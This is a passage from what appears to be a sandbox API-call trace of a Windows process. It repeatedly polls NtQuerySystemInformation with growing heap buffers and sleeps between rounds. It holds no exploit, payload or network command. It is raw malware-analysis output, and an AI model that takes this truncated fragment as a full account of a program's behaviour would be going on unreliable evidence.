(in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0250.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0250.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0250.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.553] Sleep (dwMilliseconds=0x110) [0250.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0250.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0250.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0250.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0250.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0250.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0250.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0250.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0250.570] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.571] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.571] Sleep (dwMilliseconds=0x110) [0250.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0250.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0250.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0250.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0250.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0250.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0250.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0250.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0250.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.582] Sleep (dwMilliseconds=0x110) [0250.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0250.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0250.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0250.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0250.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0250.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0250.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0250.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0250.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.597] Sleep (dwMilliseconds=0x110) [0250.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0250.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0250.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0250.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0250.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0250.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0250.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0250.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0250.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.614] Sleep (dwMilliseconds=0x110) [0250.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0250.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0250.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0250.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0250.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0250.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0250.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0250.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0250.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.630] Sleep (dwMilliseconds=0x110) [0250.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0250.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0250.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0250.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0250.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0250.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0250.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0250.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0250.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.644] Sleep (dwMilliseconds=0x110) [0250.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0250.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0250.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0250.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0250.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0250.661] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0250.662] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0250.662] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0250.663] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.663] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.663] Sleep (dwMilliseconds=0x110) [0250.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0250.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0250.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0250.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0250.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0250.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0250.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0250.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0250.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.692] Sleep (dwMilliseconds=0x110) [0250.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0250.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0250.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0250.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0250.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0250.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0250.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0250.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0250.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.709] Sleep (dwMilliseconds=0x110) [0250.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0250.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.716] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0250.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0250.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0250.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0250.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0250.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0250.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0250.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.719] Sleep (dwMilliseconds=0x110) [0250.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0250.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0250.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0250.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0250.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0250.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0250.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0250.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0250.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.738] Sleep (dwMilliseconds=0x110) [0250.747] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0250.747] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.747] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0250.747] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0250.747] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0250.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0250.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0250.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0250.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0250.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.752] Sleep (dwMilliseconds=0x110) [0250.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0250.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0250.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0250.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0250.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0250.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0250.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0250.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0250.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.766] Sleep (dwMilliseconds=0x110) [0250.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0250.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0250.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0250.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: 